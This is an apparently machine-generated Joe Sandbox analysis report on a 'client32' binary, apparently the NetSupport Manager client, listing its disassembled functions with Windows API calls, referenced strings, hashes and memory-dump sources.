                                                                                • Instruction ID: cf71befd834ca9d6d619551618e05b544aa7bc38abc68460657087db59e74738
                                                                                • Opcode Fuzzy Hash: 3ad59114b4505d2ff10dfcd5b1565abec2c6f4394dd92e1c2ff375fd271c0bfb
                                                                                • Instruction Fuzzy Hash: B0514F75E0061E9FDB00CB94CC81EEEF3B9BF98708F104169E526A7280E7316A06CB91
                                                                                Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                                • TranslateMessage.USER32(?), ref: 110276E1
                                                                                • DispatchMessageA.USER32(?), ref: 110276EB
                                                                                • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchSleepTranslate
                                                                                • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                • API String ID: 3237117195-3850961587
                                                                                • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                                • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                                • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                                Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                                • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                                • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                • API String ID: 1092798621-1973987134
                                                                                • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                                • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                                • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                                Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                • String ID: bad cast
                                                                                • API String ID: 2427920155-3145022300
                                                                                • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                                • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                                • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                                Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 1113572F
                                                                                • GetTickCount.KERNEL32 ref: 1113578C
                                                                                  • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                • wsprintfA.USER32 ref: 111357BC
                                                                                  • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                • WaitForSingleObject.KERNEL32(00000264,000003E8), ref: 11135802
                                                                                Strings
                                                                                • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                                • UI.CPP, xrefs: 111357E9
                                                                                • ResponseChk, xrefs: 11135717
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                                • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                                • API String ID: 2020353970-2880927372
                                                                                • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                                • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                                • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                                Function 11017B00 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                • API String ID: 1826621714-1320232752
                                                                                • Opcode ID: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                • Instruction ID: d5a300e082a68ff88eaf99d811029957e717e47c388a0f511f099868f117258d
                                                                                • Opcode Fuzzy Hash: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
                                                                                • Instruction Fuzzy Hash: CE312F75A0061BDBDB24DF54CD84BEAB7B8FF48305F0044E5EA09AB244EB75EA84CB50
                                                                                Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                • API String ID: 1318148156-3179819359
                                                                                • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                                • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                                • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                                Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 11081859
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                • API String ID: 1528188558-3417006389
                                                                                • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                                • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                                • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                                Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                                • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                                • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                                • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                                • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                • m_hWnd, xrefs: 1103F7E1
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 3726914545-2830328467
                                                                                • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                                • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                                • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                                Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                                • _memset.LIBCMT ref: 1115F64B
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                  • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                  • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                                • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                                • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                                • String ID: 0
                                                                                • API String ID: 176136580-4108050209
                                                                                • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                                • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                                • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                                Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memmove.LIBCMT ref: 1108132F
                                                                                • _memset.LIBCMT ref: 11081318
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
